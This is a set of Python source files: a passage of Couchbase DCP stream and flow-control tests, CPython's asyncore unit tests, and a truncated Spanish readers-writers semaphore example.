for buffsize in sizes:
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = self.dcp_client.open_producer("flowctl")
assert response['status'] == SUCCESS
response = self.dcp_client.flow_control(buffsize)
assert response['status'] == SUCCESS
stats = self.mcd_client.stats('dcp')
key = 'eq_dcpq:flowctl:max_buffer_bytes'
conn_bsize = int(stats[key])
assert conn_bsize == buffsize, \
'%s != %s' % (conn_bsize, buffsize)
def test_flow_control_set_buffer_bytes_per_producer(self):
""" use various buffer sizes between producer connections """
def max_buffer_bytes(connection):
stats = self.mcd_client.stats('dcp')
key = 'eq_dcpq:%s:max_buffer_bytes' % connection
return int(stats[key])
def verify(connection, buffsize):
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = self.dcp_client.open_producer(connection)
assert response['status'] == SUCCESS
response = self.dcp_client.flow_control(buffsize)
assert response['status'] == SUCCESS
producer_bsize = max_buffer_bytes(connection)
assert producer_bsize == buffsize, \
"%s != %s" % (producer_bsize, buffsize)
producers = [("flowctl1", 64), ("flowctl2", 29), ("flowctl3", 128)]
for producer in producers:
connection, buffsize = producer
verify(connection, buffsize)
@unittest.skip("Needs Debug")
def test_flow_control_notifier_stream(self):
""" verifies flow control still works with notifier streams """
mutations = 100
# create notifier
response = self.dcp_client.open_notifier('flowctl')
assert response['status'] == SUCCESS
self.dcp_client.flow_control(16)
# vb uuid
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
# set to notify once seqno mutations + 1 is reached
notifier_stream = self.dcp_client.stream_req(0, 0, mutations + 1, 0, vb_uuid)
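# a notifier stream requests a start seqno beyond the current high seqno; the server is expected to
# respond (with a stream-end message) only once the vbucket actually reaches that seqno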
# persist mutations
for i in range(mutations):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.wait_for_persistence(self.mcd_client)
tries = 10
while tries > 0:
resp = notifier_stream.next_response()
if resp is None:
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
else:
if resp['opcode'] == CMD_STREAM_END:
break
tries -= 1
assert tries > 0, 'notifier never received end stream'
def test_flow_control_ack_n_vbuckets(self):
self.dcp_client.open_producer("flowctl")
mutations = 2
num_vbs = 8
buffsize = 64 * num_vbs
self.dcp_client.flow_control(buffsize)
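# the buffer is sized at 64 bytes per vbucket; all streams share this single flow-control window,
# so acks are issued below until every vbucket's mutations have been sent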
for vb in range(num_vbs):
self.mcd_client.set('key1', 0, 0, 'value', vb)
self.mcd_client.set('key2', 0, 0, 'value', vb)
# request mutations
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
for vb in range(num_vbs):
self.dcp_client.stream_req(vb, 0, 0, mutations, vb_uuid)
# ack until all mutations sent
stats = self.mcd_client.stats('dcp')
unacked = int(stats['eq_dcpq:flowctl:unacked_bytes'])
start_t = time.time()
while unacked > 0:
ack = self.dcp_client.ack(unacked)
assert ack is None, ack['error']
stats = self.mcd_client.stats('dcp')
unacked = int(stats['eq_dcpq:flowctl:unacked_bytes'])
assert time.time() - start_t < 150, \
"timed out waiting for seqno on all vbuckets"
stats = self.mcd_client.stats('dcp')
for vb in range(num_vbs):
key = 'eq_dcpq:flowctl:stream_%s_last_sent_seqno' % vb
seqno = int(stats[key])
assert seqno == mutations, \
"%s != %s" % (seqno, mutations)
self.wait_for_persistence(self.mcd_client)
assert self.get_persisted_seq_no(vb) == seqno
def test_consumer_producer_same_vbucket(self):
# producer stream request
response = self.dcp_client.open_producer("producer")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, 1000, 0)
assert stream.status is SUCCESS
# reopen connection as consumer
dcp_client2 = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = dcp_client2.open_consumer("consumer")
assert response['status'] == SUCCESS
# response = dcp_client2.add_stream(0, 0)
# assert response['status'] == SUCCESS
for i in xrange(1000):
self.mcd_client.set('key%s' % i, 0, 0, 'value', 0)
stream.run()
assert stream.last_by_seqno == 1000
self.verification_seqno = 1000
dcp_client2.close()
def test_stream_request_cas(self):
n = 5
response = self.dcp_client.open_producer("producer")
for i in xrange(n):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
for i in range(n):
key = 'key' + str(i)
rv, cas, _ = self.mcd_client.get(key, 0)
assert rv == SUCCESS
self.mcd_client.cas(key, 0, 0, cas, 'new-value', 0)
self.sleep(2)
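# each CAS update rewrites a key, so the vbucket high seqno reaches 2 * n, while deduplication
# within the snapshot means only the n latest versions are expected to be streamed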
stream = self.dcp_client.stream_req(0, 0, 0, n, 0)
responses = stream.run()
mutations = \
filter(lambda r: r['opcode'] == CMD_MUTATION, responses)
assert len(mutations) == n
assert stream.last_by_seqno == 2 * n
self.verification_seqno = 2 * n
for doc in mutations:
assert doc['value'] == 'new-value'
def test_get_all_seq_no(self):
res = self.mcd_client.get_vbucket_all_vbucket_seqnos()
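# the response body packs one entry per vbucket: a 2-byte vbucket id followed by an 8-byte
# high seqno, i.e. struct.unpack(">HQ", ...) over 10 bytes per vbucket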
for i in range(1024):
bucket, seqno = struct.unpack(">HQ", res[2][i * 10:(i + 1) * 10])
assert bucket == i
# Check the scenario where time is not synced but we still request extended metadata. There should be no
# adjusted time but the mutations should appear. This test currently fails - MB-13933
def test_request_extended_meta_data_when_vbucket_not_time_synced(self):
n = 5
response = self.dcp_client.open_producer("producer")
response = self.dcp_client.general_control('enable_ext_metadata', 'true')
assert response['status'] == SUCCESS
for i in xrange(n):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, n, 0)
responses = stream.run()
assert stream.last_by_seqno == n, \
'Sequence number mismatch. Expect {0}, actual {1}'.format(n, stream.last_by_seqno)
""" Tests the for the presence of the adjusted time and conflict resolution mode fields in the mutation and delete
commands.
"""
@unittest.skip("deferred from Watson")
def test_conflict_resolution_and_adjusted_time(self):
if self.remote_shell.info.type.lower() == 'windows':
return # currently not supported on Windows
n = 5
response = self.dcp_client.open_producer("producer")
response = self.dcp_client.general_control('enable_ext_metadata', 'true')
assert response['status'] == SUCCESS
# set time synchronization
self.mcd_client.set_time_drift_counter_state(0, 0, 1)
for i in xrange(n):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, n, 0)
responses = stream.run()
assert stream.last_by_seqno == n, \
'Sequence number mismatch. Expect {0}, actual {1}'.format(n, stream.last_by_seqno)
for i in responses:
if i['opcode'] == CMD_MUTATION:
assert i['nmeta'] > 0, 'nmeta is 0'
assert i['conflict_resolution_mode'] == 1, 'Conflict resolution mode not set'
assert i['adjusted_time'] > 0, 'Invalid adjusted time {0}'.format(i['adjusted_time'])
# This test inserts 100k items into a server and
# sets up a stream request. While streaming, it forces the
# server to crash, then reconnects the stream and ensures that the
# number of mutations received is as expected.
def test_stream_req_with_server_crash(self):
doc_count = 100000
for i in range(doc_count):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.wait_for_persistence(self.mcd_client)
by_seqno_list = []
mutation_count = []
def setup_a_stream(start, end, vb_uuid, snap_start, snap_end, by_seqnos, mutations):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, start, end, vb_uuid,
snap_start, snap_end)
assert stream.status == SUCCESS
stream.run()
by_seqnos.append(stream.last_by_seqno)
mutations.append(stream.mutation_count)
def kill_memcached():
if self.remote_shell.info.type.lower() == 'windows':
self._execute_command('taskkill /F /T /IM memcached*')
else:
self._execute_command('killall -9 memcached')
response = self.mcd_client.stats('failovers')
vb_uuid = long(response['vb_0:0:id'])
start = 0
end = doc_count
proc1 = Thread(target=setup_a_stream,
args=(start, end, vb_uuid, start, start, by_seqno_list, mutation_count))
proc2 = Thread(target=kill_memcached,
args=())
proc1.start()
proc2.start()
self.sleep(2)
proc2.join()
proc1.join()
# wait for server to be up
self.wait_for_warmup(self.cluster.master.ip, self.cluster.master.port)
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
self.mcd_client = McdClient(self.cluster.master.ip, self.cluster.master.port)
response = self.mcd_client.stats('failovers')
vb_uuid = long(response['vb_0:0:id'])
assert len(by_seqno_list)
start = by_seqno_list[0]
end = doc_count
setup_a_stream(start, end, vb_uuid, start, start, by_seqno_list, mutation_count)
mutations_received_stage_one = mutation_count[0]
mutations_received_stage_two = mutation_count[1]
assert (mutations_received_stage_one + mutations_received_stage_two == doc_count)
def test_track_mem_usage_with_repetetive_stream_req(self):
doc_count = 100000
for i in range(doc_count):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.wait_for_persistence(self.mcd_client)
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
resp = self.mcd_client.stats()
memUsed_before = float(resp['mem_used'])
start = 0
end = doc_count
snap_start = snap_end = start
response = self.mcd_client.stats('failovers')
vb_uuid = long(response['vb_0:0:id'])
for i in range(0, 500):
stream = self.dcp_client.stream_req(0, 0, start, end, vb_uuid,
snap_start, snap_end)
assert stream.status == SUCCESS
self.dcp_client.close_stream(0)
self.sleep(5)
resp = self.mcd_client.stats()
memUsed_after = float(resp['mem_used'])
assert (memUsed_after < ((0.1 * memUsed_before) + memUsed_before))
""" Test for MB-11951 - streams which were opened and then closed without streaming any data caused problems
"""
def test_unused_streams(self):
initial_doc_count = 100
for i in range(initial_doc_count):
self.mcd_client.set('key1' + str(i), 0, 0, 'value', 0)
# open the connection
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
# open the stream
stream = self.dcp_client.stream_req(0, 0, 0, 1000, 0)
# and without doing anything close it again
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS
# then do some streaming for real
doc_count = 100
for i in range(doc_count):
self.mcd_client.set('key2' + str(i), 0, 0, 'value', 0)
# open the stream
stream = self.dcp_client.stream_req(0, 0, 0, doc_count, 0)
stream.run(doc_count)
assert stream.last_by_seqno == doc_count, \
'Incorrect sequence number. Expect {0}, actual {1}'.format(doc_count, stream.last_by_seqno) |
test_asyncore.py | import asyncore
import unittest
import select
import os
import socket
import sys
import time
import errno
import struct
from test import support
from io import BytesIO
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
try:
import threading
except ImportError:
threading = None
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen()
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
support.unlink(addr)
support.bind_unix_socket(sock, addr)
else:
sock.bind(addr)
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
with support.captured_stderr() as stderr:
d.log(l1)
d.log(l2)
lines = stderr.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
with support.captured_stdout() as stdout:
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
lines = stdout.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
with support.captured_stdout() as stdout:
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
lines = stdout.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event']
self.assertEqual(lines, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = support.bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((support.HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
t.join(timeout=TIMEOUT)
if t.is_alive():
self.fail("join() timed out")
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(support.TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
support.unlink(support.TESTFN)
def test_recv(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(support.TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
with support.check_warnings(('', ResourceWarning)):
f = None
support.gc_collect()
def test_close_twice(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll:
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
self.assertEqual(s.socket.family, self.family)
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(s.socket.type,
(sock_type | socket.SOCK_CLOEXEC, sock_type))
else:
self.assertEqual(s.socket.type, sock_type)
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(OSError, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with socket.socket(self.family) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=5))
t.start()
try:
with socket.socket(self.family, socket.SOCK_STREAM) as s:
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except OSError:
pass
finally:
t.join(timeout=TIMEOUT)
if t.is_alive():
self.fail("join() timed out")
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (support.HOST, 0)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (support.HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = support.TESTFN
def tearDown(self):
support.unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
if __name__ == "__main__":
unittest.main()
|
lect_escr.py | from random import random
from time import sleep
import threading
lectores = 0
mutex = threading.Semaphore(1)
cuarto_vacio = threading.Semaphore(1)
torniquete = threading.Semaphore(1)
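# Readers-writers with a turnstile (avoids writer starvation); the invariants in this sketch are:
# - mutex guards the shared reader count
# - the first reader in acquires cuarto_vacio ("room empty") and the last reader out releases it
# - a writer passes through torniquete and holds it while waiting for the room,
#   which blocks newly arriving readers until the writer gets its turn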
def escritor(id):
sleep(random())
print(" Escritor %d iniciando" % id)
torniquete.acquire()
print(" Escritor %d: En el torniquete" % id)
cuarto_vacio.acquire()
print(" Escritor %d: El cuarto es mío!" % id)
escribe(id)
cuarto_vacio.release()
torniquete.release()
print(" Escritor %d se fue" % id)
def lector(id):
sleep(random())
global lectores
print("Lector %d iniciando" % id)
torniquete.acquire()
torniquete.release()
mutex.acquire()
lectores = lectores + 1
print("%d: Ahora somos %d lectores" % (id, lectores))
if lectores == 1:
print("%d: El cuarto estaba vacío" % id)
